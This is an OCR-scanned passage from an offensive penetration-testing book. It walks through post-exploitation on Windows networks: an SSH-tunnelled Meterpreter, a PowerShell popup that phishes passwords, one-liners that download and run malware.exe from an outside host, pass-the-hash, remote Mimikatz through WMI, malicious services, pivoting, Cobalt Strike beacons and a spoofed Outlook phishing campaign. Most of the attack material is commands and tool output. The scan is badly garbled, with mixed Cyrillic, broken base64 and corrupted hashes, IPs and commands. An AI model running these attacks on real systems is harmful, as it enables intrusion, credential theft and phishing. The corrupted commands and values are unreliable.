1423 INFO: building PKG (CArchive) outOG-PKG.pkg 

3013 INFO: checking EXE 

3015 INFO: rebuilding ovtO@-EXE.toc)\ because pkg is mofe recent 

3015 INFO: building EXE from putBO-EXE.toc 

3019 INFO: Appending archive fto EXE ¥2\opt\materssh\dist \meteéerssn Jexa 
:/opt/meterssh# A MN I0 4 Пи 54 python [/monitor.py 

[*] Launching count_monitorat 8 Second intervals... 

[*] Polling... Waiting for connection into SSH encrypted tunnel... 

АМА Polling... Waitingjfor.connaction,intoa-.s5H- encrypted. tunnel. .. 

[*] Polling... Waiting Tor connection into SSH encrypted tunnel.. 

ы 

E 


+ 
+ 


+ 


*] Encrypted tunnel identified. Yipee, we gots a shell! 
Creating a ata Metasploit answer ‘file for you. 
| fait one minute, 


+ 


МА C:A\Users\cheetz\Desktop\meterssh.exe 








[91 Shellcode injection loaded into memory... 

[¥] Spawning meterpreter on localhost on port: 8821 

[*] Tunneling 55H. this takes а moment. 

[#1 You should have a shell raining іп a sec.. 

[*] Connected to 192.168 .222.129:22: successfully 
MeterSSH 


The binary file we created executed on the victim host, connected back to our server over SSH and 
created a local port forward on 8021. Additionally, the binary tunnels a Meterpreter shell through the 
SSH tunnel, bypassing any IDS or application-based firewalls. 


[*] Processing answer.txt for ERB directives. 

resource (answer.txt)> use multi/handler 

resource (answer.txt)> set payload windows/meterpreter/bind tcp 
payload => windows/meterpreter/bind_tcp 

resource (answer.txt)> set RHOST 0.0.0.0 

RHOST => 0.0.0.0 

resource (answer.txt)> set LPORT 8021 

LPORT => 8021 

resource (answer.txt)> exploit 

[*] Starting the payload handler... 

[*] Started bind handlef 

[*] Sending stage (770048 oytés) то 10 0.070 

[*] Meterpreter session l\opened К 127 .0.011:51709 -> 127.0.011:8607 
22 17:55:45 -0500 


meterpreter > shell 

Process 5936 createds 

Channel 1 created. 

Microsoft Windows [Version 6.1.7601] 

Copyright (с) 2009 Microsoft Corporation. А11 rights reserved. 


С:\Оѕегѕ\сһееїг\Оеѕкїор> 
SSH Tunnel 





Powershell 


As you can see, PowerShell is an amazing tool to use for any penetration tester. 

One of my favorite attacks is the simplest. If you ever end up on a host where you have limited 
privileges, which prevents you from using Mimikatz or even dropping executables, you can always 
ask a user for their password. 


Let’s say you have a shell on a system (doesn’t have to be Meterpreter), what if you could push a 
popup to prompt the user to type in their credentials? Let’s demonstrate the power of PowerShell: 

e cd /opt/Easy-P 

ө python ./easy-p 

e 7 - Base64 Encode 

e | - From File 

e /opt/PowerShell Popup/popup.ps1 


Privilege Escalation 

Lateral Movement 

Keylogging 

PowerShell Meterpreter 

Change Users Execution Policy 
Powershell 101 

Base64 Encode a PowerShell Script 


Mimikatz - Passwords from Memory 
[99] Exit/Quit 


iSelect An Option: 7 

1 = File; 2 = One liner: 1 

full file path and file: /opt/PowerShell Popup/popup.psl 
[*]Powershell.exe -NoP -Exec Bypass -enc ZgBlAGAAYwBOAGKkAb 
AKAC4AUWBZAE4ATwBQAFMASQBT AAOAT QBVAGQAaQBmAGKAZQBKACAAT gBp 
CAAbwBwAGUAbgBzACAAYQAgAHUAcwBlAHIAIABj AHIAZQBKAGUABGBOAGKA 


Base64 Encoded PowerShell Password Popup 





The output will be a long, base64 encoded string. Once we execute the command on our victim’s host, 
we should see results similar to those below. 


imeaterpreter > shall 

Process 8924 created 

(Channel 1 created. 

Microsoft Windows [Version 6, 
Copyright (с) 2009 Microsoft 


IC: \Users\cheetz>Powershell exe -NoP -f 

тыы ACMACQAKAC4AUWBZAE4ATWBOAFMASOBTAR 

IdWBoAGKAYwBOACAAbwBWAGUAb: 

MAEKATaBLAAoATwBy AGKAZwBpAGAAYQBSACAAUWB j AHI Aa 

Ic Aa BOAGgAdOBiACAAYwWBvAGOAL wBz AGEAbQB y AGEAdABI 

AB AHQAQGEpAG4AZABPAG4AZWAOAC "kAXQAKAFAAYOByAGE 
AHMAAAUAHUAAQAUAFAACQRVAGGAc ABGAEYAbwByAEMAc 

IAcaBL ACAAcaGBLAHEAdQBpAHIAZQBKACAAdABvACAAC i 
AiAFAADABLAGEAcwBLACAAZQBUAHQA ZQBy ACAAaQBVAHL 

( ELI ASACAAT: JALACwAI TAALAC ТАКО AKACI mayne AZAE Маке anter your amame and password, 
DwWByAGSAQwByAGUAZ ABLA AGSAGABDAGEADAROACKACQAKA 

LAHMA: FOBYAG4AYOBTAGUACQBDAPMAGABYAGK ADQENAFGA. User name: {| adnn 

IoACaB3AHIAaQBOAGUALQBPAHUAdABwWAHUAdAAgACQAdQB: 

IOAKAAGAQQ QB 1 AHE JAaABTA FAA buh АСА ААКЁАА== 

Powershell..exe -NoP -Exec Bypass -ene 29814641 

ICAAUMBZAEAA КТЕ. SOBTAAOATC DBVAGQAAQBMAGKAZO 
bwEWwAGUADGBZACAAYQAGAHUAcWHLAHTATAB) AMT AZÜBKA 
y AGKA Zw pAGAAYQBSACAAUMB] AHTAAQBWAHQAT ABhAG4A; 

| AYWBVAGORL MER ADS leper АВАРИ ASABVAGSA 
ABDAGGA/WAOACKAKQAKAPAAYQBYAGEABQAgAC "aAKQAK 
AFAACBVAGGACABGAEYAbw8 y AEMJ СОВА GQAZQBu AHO: 

AGQRDAHIAZOBKACAAGABVACAACABLAHIAZOBYVAH] д) 
BLACAAZÜBUAHQAZÜByACAAeQBv AHUAC gAgAHUAC МЕТАН 

IST PETERET TT AUN TTE AGUAZABZ AC AA POAQACQAY wt 

ZABLAGAAGABDAGEADAAOACKA ДАКАР} ALWEGAHT AaQBuAG 
t AGUACaBbAFMAdAByAGkAbaBnAFGAJABWAGEAcwBZACAAF 
LUALQBPAHUAdABwAHUAdAAqACQAd(BzAGUAC aAKAHe Ac aBr 
ABTAFAAbwBwAHUAcAAKAA== 

admin 

password 


ry a И ' 


s; 
82 ААД YOAGAHUACK WEI 








Password: EL) 




















PowerShell Password Popup 


The window on the right shows that the victim received a popup that says, “Credentials are 
required.” Once the victim enters their credentials and hits OK, the response is sent back to our 
command shell. This is where a little social engineering takes place. In some cases, the user might hit 
cancel or close the password prompt without typing in their credentials, but . . . if you run the 





command three or four more times, more than likely, the user will get tired of the message and will 
end up putting in their password. A benefit of this type of attack is that the victim host did not need to 
download anything from the Internet, since you encoded the whole payload and we did not need any 
elevated privileges. 


Windows 7/8 Uploading Files To The Host 


On Windows 7 and 8, a better way to get files on a host is using bitsadmin or PowerShell. Using 
bitsadmin is great because it is used for Windows updates and utilizes IE proxy settings. If the 
organization has a web proxy that requires AD credentials, this will allow you to get around it. 


PowerShell (check the Post Exploitation with PowerSploit section for more details) 


ө cmd.exe /c "PowerShell (New-Object 
System. Net. WebClient). DownloadFile(‘http://www.securepla.net/malware.exe',' 
malware.exe');(New-Object -com Shell.Application).ShellExecute('malware.exe')" 


Bitsadmin 
e cmd.exe /c  "bitsadmin /transfer myjob /download /priority high 
http://www.securepla.net/malware.exe c: malware.exe&start malware.exe" 


Pivoting 


If you have compromised a host and realize that it is either dual-homed or connected to multiple 
networks, your attacks will have to pivot through that compromised host. The following example will 
route a port scan through our initial victim host to the segmented network. 


Autoroute and Auxiliary Scan 
ө run autoroute -s 192.168.1.0/24 


ө run autoroute -p 

e background 

e use auxiliary/scanner/portscan/tcp 
e set RHOSTS 192.168.1.127 

e set PORTS 135,139,445 

e set THREADS 20 

e exploit 


msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1... 


meterpreter > run autoroute -s 192.168.1.0/24 

[*] Adding a route to 192.168.1.0/255.255.255.0... 

[*] Added route to 192.168.1.0/255.255.255.0 via 192.168.3.73 
[*] Use the -p option to list all active routes 

meterpreter > run autoroute -p 


Active Routing Table 


Gateway 


192.168.1.0 255.255.255.0 Session 1 


meterpreter > background 

[*] Backgrounding session 1... 

msf exploit(handler) > use auxiliary/scanner/portscan/tcp 
maf auxiliary(tcp) > set RHOSTS 192.168.1.127 

RHOSTS => 192.168.1.127 

msf auxiliary(tcp) > show options 


Module options (auxiliary/scanner/portscan/tcp): 


Name Current Setting Required Description 
CONCURRENCY 16 

PORTS 1-10000 | Ports to scan (e.g. 22 
RHOSTS 192.158.1.127 The target address rang 
THREADS 1 The number of concurrer 
TIMEOUT 1000 The socket connect time 


mef auxiliary(tcp) > set PORTS 137,139,445 
PORTS => 137,139,445 
msf auxiliary(tcp) > exploit 


192.168.1.127:445 - TCP OPEN 
192.168.1.127:139 - TCP OPEN 
Scanned 1 of 1 hosts (100% complete) 
Auxiliary module execution completed 


Pivoting 





Now that we have a pivot set up, we can use additional tools through that same pivot tunnel: 
e use auxiliary/scanner/discover/udp probe 
e use exploit/windows/smb/psexec 


Socks Proxy 
Sometimes you need to run non-metasploit modules through your first victim host. It might be a 


vulnerability scanner, nmap, or a particular exploit. Once we have a Meterpreter shell, we can 
background that session and add some routes. We want to be able to pivot through this first host and 
run nmap in our example. 


In our next example, our victim host has an IP of 192.168.2.24, but also has access to the 
192.168.1.0/24 range. Since we can't access that network directly, we will have to pivot off this box 
using proxychains: (52)(53) 

e route add 192.168.1.0 255.255.255.0 4 

e route print 

e use auxiliary/server/socks4a 

e run 


This enables a listener on our Kali attacker host on port 1080. We now need to modify the default 
proxychains configuration to match our Metasploit settings. After that, we can kick off nmap through 
our socks4 proxy using the proxychains tool: 
e gedit /etc/proxychains.conf 
o change “socks4 127.0.0.1 4444" to “socks4 127.0.0.1 1080” 
e proxychains nmap -sT -PO -p135,139,445 192.168.1.127 


The output should look something like: 
e root@kali:~# gedit /etc/proxychains.conf 
e root@kali:~# proxychains nmap -sT -PO -p135,139,445 192.168.1.127 
e ProxyChains-3.1 (http://proxychains.sf.net) 


Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-21 17:10 EDT 
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.1.127:135-<><>-OK 
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.1.127:139-<><>-OK 
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.1.127:445-<><>-OK 
Nmap scan report for win7-core (192.168.1.127) 

Host is up (1.5s latency). 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 


Move Laterally with Hashes 

As you might have heard, pass-the-hash is dead... or is it? A big change that occurred in the last year 
is that Microsoft patched the ability to connect to remote systems using accounts that are members of 
the localgroup “Administrators”. This used to be the easiest method to move laterally when you 
grabbed Local Admin passwords from Group Policy Preferences and used PSExec. 


There is one exception to this-the patch did not affect local default admin accounts with RID 500. 
Even if you changed the username for the RID 500 account, it can still be used to move laterally.(54) 
(55) 


Once you obtain hashes for the RID 500 account ог you get onto a network without patched client 
systems, you can use the hashes, instead of passwords, to gain Meterpreter shells. As specified 
before, we are going to use psexec psh instead of the standard psexec. 


Module options [exploit/windows/smb/psexec реп) : 
Name Current Setting Required Description 


DryRun alse | Prints the powershell сотта 
RHOST 72.16 ү The target address 

RPORT GE Set the SMB service port 
SERVICE DESCRIPTION Service description to to 
SERVICE DISPLAY NAME The service display name 
SERVICE NAME 10 The service name 

SMBDomain WORKGROUP The Windows domain to use 
SMBPass The password for the speci 
sSMBUser The username to authentica 


Exploit target: 


Id Name 


0 Automatic 


sf exploit(psexec psh) > set SMBPass aad3b435b5]40@eegad3b436b5 ЕНЕ Е 
Pass => gad3b435b51404eeaad3b435b5 1 404ee : Gaaddbc das 096209 TUE sieIe ЫТ а 
exploit(psexec psh) > set SMBUser Administrator 
User => Administrator 
exploit(psexec psh) > exploit 


Started reverse handler on 172.16.151.141:4444 

172.16.151.201:445 - Executing the payload... 

172.16.151.201:445 - Service start timed out, OK if running a command or n 

Sending stage (770048 bytes) to 172.16.151.201 

Meterpreter session 5 opened (1/2.16.151.141:4444 -> 1/2.15.151.201:605273) 
Using Hashes to Pivot 


By setting SMBPass to use the hash, we don't need to crack any hashes to exploit remote systems. 


Moving Laterally with NTLM Hashes 

We know if we have other users logged into the system, we can use incognito and impersonate tokens. 
(56) What if you had hashes from different systems and wanted to become the remote user on the 
current compromised machine? 





This is where we can use our manipulated WCE (Windows Credential Editor) binary that we 
configured in the Evading AV section and use it to import hashes onto our victim host. For the 
example below, we are assuming we already have local admin or system type access. With our 
Meterpreter shell, upload your WCE binary to an accessible location: 

e upload /opt/wce.exe C:\\users\\public 
We can drop into a shell with the shell" command and list our current hashes on the local machine: 

e shell 

e cd Nusers public 

e wee -l 





60000006 38000000000800000000 :561 175] 328655F 70B f 





WCE - Importing Hashes 


Notice we only have two sets of hashes on this system. From a prior compromise, we were able to 
get the hashes of a domain administrator. We need to import these hashes onto our current victim host 
with the following command: 

ө wce.exe -s [hash] 


As you can see from the image below, we were successful in importing the hashes for the user “lab”. 


C:\Users\Publicswee -s lab:HACKER:aad3b435b5140denaad3b435b5140426 :8323d8c4887967093' 
Т-Н ЕКЕ ТЕ Л ЕЕЕ ЕК «ТЕЛ ЕЕН ЕЕЕ Н ЕНЕ К ДЕ ЕТ + 
WCE vl.42beta (X64) (Windows Credentials Editor) - (с) 2010-2013 Аара Security -1b 
Use -h for help. 


Changing NTLM credentials of current logon session (0087D51Eh) to: 
Username: Lab 

domain: HACKER 

LMHash: aad3b435b5]4G4eeaadsb435b5 1 4adee 

NTHash: Gaasdec4ab/962d9356e09480de5ebbe 

NTLM credentials successfully changed! 


C:\Users\Publicsdir \\de\c$ 
dir \\de\c$ 


Access 15 denied, 


C:\Users\Publicsnet use RC CT /user:hackerilab 
net use * \\de\c$ /user:hacker\lab 
Drive 2: is now connected to \\dc\c$. 


The command completed successfully. 


C:\Users\Publicsdir 2:\ 

dir £:^ 
Volume in drive Z has no label. 
Volume Serial Number is 4O0F8-1BB4 


Directory of AC 


08/22/2013 08:52 <DIR> PerfLogs 
12/28/2614 03:28 <DIR> Program Files 
08/22/2013 68:39 <DIR> Program Files (x86) 
01/19/2015 85:35 <DIR> share 
02/05/2015 12:29 <DIR> Users 
01/05/2015 02:02 <DIR> Windows 

WCE - Access Hosts Using Hashes 


With the “lab’s” hashes imported, we can try to access the domain controller’s C-drive. When trying 
to connect to the domain controller (dc) via “dir \\dc\c$”, we get an access denied message. This is 





due to the fact that it is not using the “lab” account. We can mount the domain controller’s C-drive 
using the imported credentials with the following command: 
e net use * \\dc\c$ /user:hacker\lab 


Now, use the cached “lab” account hashes to access the domain controller. The image above shows 
that we successfully mounted the domain controller to the Z-drive and we now have the ability to 
interact with the DC. 


This attack leads to a wealth of additional attacks and is a great complement for smart, lateral 
movement. 


Moving Laterally with WMI 

WMI allows you to remotely execute PowerShell commands. The benefit of this attack is that it will 
evade anti-virus as the PowerShell commands all run in memory. In the examples below, we will be 
supplying credentials with WMI to execute our commands: 


ө wmic /USER:"hacker\testuser 1" /PASSWORD:"!Asdfasdfasdfl !" 
/NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New- 
Object 


Net. WebClient). DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerSplc 
Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt" 

e dir \\win8\c$\Users\Public\ 

e type \\win8\c$\Users\Public\a.txt 

ө del \\win8\c$\Users\Public\a.txt 


In the image below, we are currently on the host win7. We execute a wmic call to remotely execute a 
PowerShell script against the host win8. This command will run Mimikatz and dump it out to a file on 
our remote host. Once completed, we can read this file from our win7 host. 


C:M s\testuserl> c /USER:"hacker\testuse /PASSWORD:"!Asdfasdfasdfl!" /NODE:1 
с bypass IEX (New-Object Net .WebClient) .DownloadString('https://raw.githubuserconter 
mikatz.psl'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt" 
mic /USER:"hacker\testuserl" /PASSWORD:"!Asdfasdfasdfl!" /NODE:172.16.151.201 proce 
bject Net .WebClient) .DownloadSt ring( 'https://raw.githubusercontent .com/cheetz/PowerS 
D Out-File C:\\Users\ 


Sers\PUuBLLC \4.txt 
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Moving Laterally with WMI 


Moving Laterally Using Services 
Another way to move laterally is to move and execute a file on another system to which you have 


access. We heavily used PowerShell to download and execute files in prior examples. However, you 
might come across that one system that doesn't have PowerShell enabled. In the next command, we 
will copy our malware to the remote host’s public folder: 

e copy malware.exe \\[Remote Machine]\C$\users\public 


Then, we will create a service called Antivirus, and configure that service to execute our malware: 
e sc \\[Remote Machine] create Antivirus binpath= "c:\users\public\malware.exe" 
o Make sure to add the space between binpath= and your executable. 


Lastly, we can start that service with: 
e sc \\[Remote Machine] start Antivirus 


Ainsi S users \publie 


reate Antivirus binPath 





iui ng 





start Antivirus 


C:MIserstestuseriMDesktopssc | 


Creating Malicious Services 


Remember that you will need a privileged account on the remote machine that can create services and 
start/stop them. 


Proxy Between Hosts 
Let's say you are on the network, but you cannot reach to specific subnets because they are only 


allowed access by certain user machines or IPs. In these cases, you will have to proxy off a user with 
the proper IPs or access. 


Windows: 

One of the cheap and easy ways to proxy between hosts in segmented networks is to utilize a default 
Windows function. Netsh is a command line tool to modify network configurations. The following 
command will put the host in listening mode on port 8080 and redirect all requests to 192.168.5.33 
over port 3389. This will be an easy way to proxy RDP traffic into other hosts. Remember you will 
need elevated privileges to run these commands. 


You can either use WMIC to execute remotely or if you already have a shell, then use the following 
command: 
e netsh interface portproxy add v4tov4 listenport=8080 listenaddress-0.0.0.0 
connectport=3389 connectaddress=192.168.5.33 


If you want to do it straight through Netsh remotely: 
ө тер add \\<Remote 
IP>\HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System lv 
LocalAccountTokenFilterPolicy /t КЕС DWORD /d 1 
e sc \\<Remote IP? start remoteregistry 
e sc Vc Remote IP> start remoteaccess 
e netsh 
e set machine «Remote IP> 
e interface рогіргоху add  v4tov4  listenport-8080 listenaddress-0.0.0.0 
connectport-3389 connectaddress-192.168.5.33 


The great part about Netsh port proxy is that it supports IPv4 to Ipv6 proxying. You can now take one 
ofthe compromised hosts and proxy your RDP requests to that segmented network.(57) 
Linux: 
The old but always faithful proxying through Linux uses Netcat and backpipes. On the victim host 
through which you want to proxy, run the following commands below.(58) 

e mknod backpipe p 

e nc -l -p 8080 0<backpipe | nc 10.0.18.134 3389 | tee backpipe 


In the example above, we proxy through the compromised host by connecting to port 8080. This 
forwards the connection to an RDP service at IP 10.0.18.134. 


Commercial Tools: 


So far, I have talked about many open source tools. Now, I want to also mention their commercial 
counterparts. This is solely to build awareness of what is available out there as a resource. I am 
frequently asked if it is better to go totally open source or commercial products. There is no right or 
wrong answer. What is important is that you do not limit yourself to one side or the other, but instead, 
find the processes, tools, and techniques that are right for that particular job. 


Cobalt Strike: 


Cobalt Strike is one of my favorite tools for a multitude of reasons. Cobalt sits on top of the 
Metasploit Framework and can attack, pivot, evade AV, establish persistence and, most importantly, 

provide custom payloads (such as Beacon). More on Beacon here: 
http://www.advancedpentest.com/help-beacon. The main reason I recommend that all pentesters look 
into Cobalt Strike is due to the way their C2s communicate over DNS. Networks are starting to 
thoroughly regulate what traffic can go out of the network with tools such as Next-Generation 
Firewalls. Tools like Cobalt Strike use DNS as a way to use the current network infrastructure in 
order to bypass a lot of the network security detection tools. 


New Cobalt Strike licenses cost $3,500 per user for a one-year license. License renewals cost 
$2,500 per user per year You can get a 21-day trial license by going to: 


http://www.advancedpentest.com/ 


A lot of the attacks discussed in this book-such as keyloggers, pivoting, AV evasion-are incorporated 
into Cobalt Strike in an easy-to-use fashion. The best part is that you are able to see your attacks 
visually, while having full command line, as you would with msfconsole. It is really the best of both 
worlds. 


Getting Started with Cobalt Strike: 


e http://www.advancedpentest.com/download 
e mv cobaltstrike-trial.tgz /opt/ 


ө cd /opt/ 
e tar zxvf cobaltstrike-trial.tgz 
e update-java-alternatives --jre -s java-1.7.0-openjdk-1386 
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 ayload: windows/beacon http/reverse http 





Host 172.16.151.141 





windows Dropper 
Windows Executable 
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Cobalt Strike - Beacons 


e Go to View --> Beacons 

e You will see a listing of all available Beacons 

e Interact with your currently active Beacon 

e Inside the Beacon Command Prompt, type BypassUAC and select 
beacon payload 


the 


‘Cobalt Strike View Hosts Attacks Workspaces Help 
+ Cj sip ^ li 
+ OB 
* [jJ smtp 
+ O ssh 
a [3 ssl 
+ [jtelnet 
+ Cj tftp 


# M unirenter Me 172.16, 151,202 













Choose a listener 


name payload 


win_met windows/meterpreter/reverse_http 





eneric/shell reverse tcp 





windows/beacon http/reverse http 









Unknown command 
beacon> 

Unknown command 
beacon> 

Unk 
beacon 
beacon> 


|. choose»! |. Add... | 








Cobalt Strike - BypassUAC 


If we go back to the Beacons list, we will see our new Beacon connection with an asterisk (*) next to 
it. 


a ваа 
+ Cy smtp 
a [3 ssh 
+ O ssl 
+ [j telnet 
+ [jg tftp : 
+ [j unicenter 172.16. 151.202 
в O vne 
a [3 vpn 
* [3 winrm 

+ [Jj wins 
+ (yj payload „ 











Console x | Beacons X | Beacon 172.16.151.202(92908 x| Beacon 172.16.151.202@2712 x| 


















external 4 internal user computer note pid last 
172.16.151.202 172.16.151.202 testuserl * WIN7 2712 59s 
172.16.151.202 172.16.151.202 testuserl WIN7 2908 859ms 


Cobalt Strike - New Beacon 


If we interact with this Beacon, we can do the normal commands: 
e help - get a listing of all the commands 
e getsystem - elevate to system 
ө ps - list processes 
e steal tokens - steal tokens of a Domain Admin User 
e spawn shell sessions 
e sleep 0 - for dropping into a meterpreter shell 
e mode http - for dropping into a meterpreter shell 
e meterpreter - drop into a meterpreter session 


| T ug 
| * [j smtp 
| € (ssh 
| + [3 ssl 
+ [jtelnet 
+ (tftp = 
€ [3 unicenter 172.16. 151. 202 
+ Q vnc 
+ [j vpn 
+ [3 winrm 
+ (wins 
€ G payload v 











a v 


| Console X | Beacons X | Beacon 172.16.151.202@2908 X | Beacon 172.16.151.202( 
| | = з 


| 





m 


€ 









Spawnto Set executable to spawn processes into 
steal token Steal access token from a process 

task Download and execute a file from a URL 
timestomp Apply timestamps from one file to another 
unLink Disconnect from parent Beacon 

upload Upload a file 


beacon> getsystem 

[*] Task beacon to get SYSTEM 
host called home, sent: 14 bytes 
Impersonated NT AUTHORITY\SYSTEM 





beacon> 





= B escalate ^ 
J droplnk 
2 getsystem 
L) ms10. 073 kbdlayout 
3 net. runtime modify 
LJ screen unlock ” 
172. 16. 151.202 
HACKER\testuserl ё WIN7 
Console Х | Beacons X | Beacon 172,16,151.202@2712 X | Meterpreter3 X | Meterpreter3 X | Dump На 


Post module running as background job 
Running module against WIN7 
Hashes will be saved to the database if one is connected. 
Hashes will be saved in loot in JtR password file format to: 
/гоої/ „5 #4/1001/20150115014752 default 172.16.151.202 windows hashes 429476, txt 
Dumping password hashes... 
Running as SYSTEM extracting hashes from registry 
Obtaining the boot key... 
Calculating the hboot key using SYSKEY 61311de359d2dafde9e4b565c99f¢ 163, , 
Obtaining the user List and keys.. 
Handle is invalid, retrying,.. 
Obtaining the boot key... 
Calculating the hboot key using SYSKEY 61311de359d2dafde%e4b565c99fc 163, , 
Obtaining the user List and keys... 
Decrypting user keys... 
Dumping password hints... 
No users with password hints on this system 
Dumping password hashes... 
Administrator: 500: aad3b435b51404eeaad3b435b51404ee ; 3106с?е016ае931073с5917е0с089с0: 
win7: 1000: aad3b435b51404eeaad 3b435b51404ee : 1c96c42db88e6248094db 1f 2958732c8: : 





Cobalt Strike - Compromised Hosts 


The real benefit of Beacon is that it is a low and slow attack. You can configure it to do all your 


command and control, and exfiltration over DNS with all the functionalities of Metasploit. 


Benefits: 

e Meterpreter in memory over Beacon 

e Beacon is low and slow 

e Full communication over DNS - no direct communication to the attacker host 

e Beacon uses Cobalt Strike's Artifact Kit to generate an anti-virus safe DLL for 

BypassUAC 

ө Custom Office Files with Payloads (Word/Excel) 

e Phishing 

e Really easy use with PowerShell 

e Creating Executables to Bypass AV 

e Team mode 
© Connect multiple clients to a single server to share exploited systems 
and work together 
о http://www.advancedpentest.con/help-setup-collaboration 


Without going through all the examples, I highly recommended these videos to watch: 
ө Deliver DNS Trojan with Microsoft Office Macro: 
https://www.youtube.com/watch?feature=player_embedded&v=Ex_bvwMDDbO 
ө Cobalt Strike Training: http://www.advancedpentest.com/training 


Conclusion: 

Cobalt Strike is a must-have for a penetration tester. It heavily utilizes the Metasploit Framework, but 
extends it significantly. The penetration game 1s changing and what used to be smash-and-grab 
penetration testing 1s now about low and slow. 


Immunity Canvas 
(http://www.immunityinc.com/products/canvas/) (Kali Linux/OS X/Windows) 


Immunitys Canvas makes available hundreds of exploits, an automated exploitation system, and a 
comprehensive, reliable exploit development framework to penetration testers and security 
professionals worldwide.(59) 


Similar to Metasploit's framework, Canvas is built to be very flexible and 1s easy to build upon. 
Instead of being built on Ruby, as with the Metasploit Framework, Canvas 1s built on Python. The 
GUI is built on top of pyGTK. Canvas’ bread and butter is the fact that it uses MOSDEF. MOSDEF is 
a custom C compiler for payload construction. This allows attackers the ability to write additional 
code in the memory of the exploited host without having to touch the disk. 


Executing Canvas is pretty straightforward and once you have identified a vulnerability, exploiting it 


is very much like Metasploit. In the following example, I will build a callback trojan and execute it 
оп а victim machine. 
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зе © са Current Current ©, 
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Target Host Stop Exploit Configuration Callback Target(s) Screen Shots 
ран SSS 
Modules Search Node Tree Exploit Description 
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Canvas 


Why get Canvas? Not only for the easy-to-build custom exploits, but for the ease of use in exploiting 
vulnerabilities and for the number of default custom exploits. Numerous times I have searched for a 
specific exploit on the Security Focus site and find no available public exploits for that vulnerability. 
However, browsing through Immunity Canvas’ repository, I will find the exact exploit I need. 


< З securityfocus.com | 
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Symantec Connect 


A technical community for Symantec customers, end-users, developers, and partners. 






info discussion exploit solution references 


Cacti Multiple Unspecified Security Vulnerabilities 


Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, 
please mail us at: vuldbQsecurityfocus.com. 


Privacy Statement 


No Exploit Found on SecurityFocus 


Modules | Search Node Tree Exploit Description 


CYE-2014-5261 


ARCH: [| ‘Linux 

SITE: Remote 

TYPE: Web Exploit 

CVE NAME: СУЕ -2014-5261 
VENDOR: The Cacti 
CHANGELOG: http 


7. NOTES: 


(lid credentia with the permissions to update tr Globa ettings 1 qui 
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Exploit Available Through Canvas 
For me, I use Canvas for the 0-day exploits. Immunity has partnered with: 
e Gleg - Agora 
e Gleg - SCAD+ 
e DSquare - D2 
e InvetvyDis - VulnDisco 
e Enable - VolPPack 


These guys provide monthly 0-day exploits for research they are working on. For example, D2 
focuses mostly on web 0-day exploits, while VulnDisco focuses mostly on service type 
vulnerabilities. For more information, go to: 


http://www.immunityinc.com/products/canvas/canvas-exploit-packs-overview.html 


Conclusion: 

Canvas is a great toolkit to have in your bag. The fact that it uses Python as its core makes it easy for 
many penetration testers to build their own modules and exploits. If you are looking for someone else 
to do a lot of the 0-day research on third party software, I highly recommend investing in Canvas. 


Core Impact 
(http://www.coresecurity.com/core-impact-pro) 


The last commercial tool I want to discuss 15 Core Impact. Core is probably one of the most 
expensive tools you can have in your offensive testing bag, but it is worth the price. Core Impact 
allows for easy automation of exploitation and is said to have 25% more unique Common 
Vulnerability Exploits (CVE) versus its competitors. 


For those who are really looking for a more automated visual approach, Core Impact is for you. It is 
an all-in-one tool to attack web, network, mobile, client and even wireless. Remember the good old 
days of auto-pwn? Well, Core has taken this to another level. With a click of a button, it is able to 
scan, compromise, take hashes/passwords, persistence and more. 
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Core Impact 


Core Impact is modular like Metasploit, where you can pick and choose exploits to attack victim 
machines. The greatest benefit of Core Impact is that it i easy to use. Honestly, going through a 
network test is as easy as clicking on: 1) Network Information Gathering, 2) Network Attack and 
Penetration, 3) Local Info Gather, and so on. Their exploits are well-tested, actively work on IDS/AV 
evasion, and perform most of the local information gathering that you might do on a penetration test. It 
takes most of the manual work out of the test. 

The example below shows that I have compromised a host and kicked off the Local Information 
Gathering module. Core Impact automatically starts pulling local system information and passwords 
from common software that store passwords (browsers, Putty, Outlook), runs Mimikatz and more. 
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Core Impact - Exploitation 


Conclusion: 
Core Impact not only has a number of well-tested exploits outside the open source platforms, but is 
easy to use throughout the whole pentesting cycle, which makes it a powerful tool. 


Two-Minute Drill - From Zero To Hero 


Since the last book, I thought it would be helpful to include a walkthrough of a full attack. Here’s the 
scenario: You are on Day 5 of your test and you haven’t been able to exploit the SUCK network. It’s 
time for the two-minute drill. You have two minutes left and you need to go from your ten-yard line 
and cover the next 90 yards. This isn’t the only way or even the best way of doing a penetration test, 
but it is one theoretical attack path. 


Ten-Yard Line: 


First, we need to get email addresses by using Discover and Recon-NG from the Before the Snap 
section. This results in a handful of email addresses. Through testing, we have figured out that emails 
with an Office extension (docx, pptx, xlsx) do not pass through their mail filter. 





Gathering Email Addresses 


Twenty-Yard Line: 


We then go to The Screen section, and use SET to set up a fake website, which clones their Outlook 
Web Application (OWA) external site. Then use the script from /opt/spearphishing/client/spear.py to 
send out multiple spoofed emails from IT. 


< ttps://fake.suck.testlab/owa/auth/logon.aspx?ge-f3a3beefabecaa53 c 


licrosoft" 





] Use the light version of Outlook Web App 


User name: |victim&sucktestlab| 


Connected to Microsoft Exchange 
€ 2010 Microsoft Corporation. All rights reserved. 





Outlook Web Upgrade © кых x We x ев 


8:52 PM (0 minutes ago) + 
IMPORTANT 


Due to a recent rise in security breaches in our industry, we have upgraded 
our Outlook Mail system 


Please visit https //suck test! m/owa to make sure you can still login 
Failure to do so may result in your account being locked out. 


Thank you for your co-operation 


IT Security 


———————————PÁ 


This email may contain confidential and privileged information for the 
sole use of the intended recipient. 

Any review or distribution by others is strictly prohibited. 

If you are not the intended recipient, please contact the sender and delete 
all copies. Thank you. 


Spear phishing 


Afterwards, we obtain a few passwords and validate that we can log into OWA. Now that we on 
their internal mail system, we have the ability to skip the Email proxy and send files from one user to 
another with Microsoft Excel documents. 


Thirty-Y ard Line: 


Going back to the Special Teams section, create a malicious Excel file using Generate-Macro.ps. 
